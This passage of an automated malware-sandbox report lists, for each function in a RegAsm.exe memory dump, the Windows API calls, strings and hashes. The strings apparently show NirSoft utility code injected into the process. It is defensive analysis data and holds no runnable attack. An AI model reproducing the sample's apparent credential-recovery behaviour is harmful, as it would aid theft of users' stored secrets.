                                                                • Instruction Fuzzy Hash: D441A775640204ABDB10AF25CC86FC537A9FF44704F0804BAFE09AF2A7DB799955CB68
                                                                APIs
                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                • String ID:
                                                                • API String ID: 552707033-0
                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf
                                                                • String ID: %%0.%df
                                                                • API String ID: 3473751417-763548558
                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                APIs
                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                • GetParent.USER32(?), ref: 00406136
                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                • String ID: A
                                                                • API String ID: 2892645895-3554254475
                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                APIs
                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                • memset.MSVCRT ref: 0040DA23
                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                • String ID: caption
                                                                • API String ID: 973020956-4135340389
                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                APIs
                                                                Strings
                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf$wcscpy
                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                • API String ID: 1283228442-2366825230
                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                APIs
                                                                • wcschr.MSVCRT ref: 00413972
                                                                • wcscpy.MSVCRT ref: 00413982
                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                • wcscat.MSVCRT ref: 004139DC
                                                                • memset.MSVCRT ref: 004139B8
                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                • memset.MSVCRT ref: 00413A00
                                                                • memcpy.MSVCRT ref: 00413A1B
                                                                • wcscat.MSVCRT ref: 00413A27
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                • String ID: \systemroot
                                                                • API String ID: 4173585201-1821301763
                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                • API String ID: 4139908857-2887671607
                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                APIs
                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                • memcpy.MSVCRT ref: 0040C11B
                                                                • strchr.MSVCRT ref: 0040C140
                                                                • strchr.MSVCRT ref: 0040C151
                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                • memset.MSVCRT ref: 0040C17A
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                • String ID: 4$h
                                                                • API String ID: 4019544885-1856150674
                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                • String ID: 0$6
                                                                • API String ID: 4066108131-3849865405
                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                APIs
                                                                • memset.MSVCRT ref: 004082EF
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • memset.MSVCRT ref: 00408362
                                                                • memset.MSVCRT ref: 00408377
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 290601579-0
                                                                • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$wcslen
                                                                • String ID:
                                                                • API String ID: 239872665-3916222277
                                                                • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                • String ID: %s (%s)$YV@
                                                                • API String ID: 3979103747-598926743
                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                • String ID: Unknown Error$netmsg.dll
                                                                • API String ID: 2767993716-572158859
                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                APIs
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                • API String ID: 3176057301-2039793938
                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                APIs
                                                                Strings
                                                                • out of memory, xrefs: 0042F865
                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                • database is already attached, xrefs: 0042F721
                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpymemset
                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                • API String ID: 1297977491-2001300268
                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                APIs
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                • memcpy.MSVCRT ref: 0040EB80
                                                                • memcpy.MSVCRT ref: 0040EB94
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                • String ID: ($d
                                                                • API String ID: 1140211610-1915259565
                                                                • Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                • Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                APIs
                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                • String ID:
                                                                • API String ID: 3015003838-0
                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                • memset.MSVCRT ref: 00413ADC
                                                                • memset.MSVCRT ref: 00413AEC
                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                • memset.MSVCRT ref: 00413BD7
                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                • String ID: 3A
                                                                • API String ID: 3300951397-293699754
                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • memcpy.MSVCRT ref: 0040D24C
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                • String ID: strings
                                                                • API String ID: 3166385802-3030018805
                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                APIs
                                                                • memset.MSVCRT ref: 00411AF6
                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                • String ID: AE$.cfg$General$EA
                                                                • API String ID: 776488737-1622828088
                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                APIs
                                                                • memset.MSVCRT ref: 0040D8BD
                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                • memset.MSVCRT ref: 0040D906
                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
